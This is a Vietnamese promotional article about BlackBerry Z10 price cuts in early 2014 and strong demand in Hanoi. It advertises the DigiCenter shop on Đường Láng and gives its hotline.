Những ngày đầu năm 2014, BlackBerry đã liên tục làm người dùng “sốc” khi liên tục giảm giá siêu phẩm BlackBerry Z10 tới mức giá của một sản phẩm bình dân. Đây là điều gây ngạc nhiên với cả những người lạc quan nhất, bởi với mức giá cao tới gần 2 lần giá 4.5 triệu đồng hiện tại, Z10 đã được đánh giá là mang lại sức hấp dẫn rất lớn. Đây là cơ hội tuyệt vời để những người yêu thích BlackBerry trước đây và yêu thích Z10 nhưng chưa có cơ hội mua được thỏa mãn mong ước của mình. Xem thêm các phiên bản BlackBerry Z10 đang bán tại DigiCenter

BlackBerry cho thấy lượng Fan của mình vẫn vô cùng đông đảo, khi mà lượng máy BlackBerry Z10 chính hãng được bán ra thời gian gần đây chỉ đủ thỏa mãn nhu cầu quá bé của khách hàng. Và để mua được những sản phẩm cao cấp với mức giá hấp dẫn này, khách hàng sẽ phải đặt hàng và đợi trong thời gian 1 tới 3 tuần, thậm chí là lâu hơn.

Trước nhu cầu lớn từ thị trường, sau nhiều lỗ lực tìm kiếm nguồn hàng, Digicenter là một trong số ít cửa hàng tại Hà Nội nhập về số lượng lớn BlackBerry Z10 mới và cũng chỉ bán với mức giá như hàng chính hãng, thay vì mức giá cao hơn nhiều được đa số các cửa hàng điện thoại khác chào bán. Đây là lựa chọn tuyệt vời cho các tín đồ BlackBerry khi có thể nhanh chóng nhận được sản phẩm mình thích với giá rẻ nhất mà không phải chờ đợi. Theo anh Nam, chủ cửa hàng Digicenter tại 91 Đường Láng, Hà Nội thì hầu hết điện thoại mới được bán trong thời gian này tại cửa hàng là BlackBerry Z10 bởi sức hút của thương hiệu này tại Việt Nam còn quá lớn. Bên cạnh đó, không thể phủ nhận Z10 là một sản phẩm rất tốt, rất toàn diện, và có giá trị sử dụng vượt xa mức giá bán hiện tại.

Quý khách hàng có nhu cầu hỗ trợ thông tin hoặc cập nhật tình trạng sản phẩm, giá mới nhất của sản phẩm có thể liên hệ trực tiếp với số hotline 0973 777 333 hoặc trực tiếp ghé thăm Showroom Digicenter tại 91 đường Láng để được tư vấn nhiệt tình và đầy đủ nhất về BlackBerry Z10.

Xem thêm
1 2 3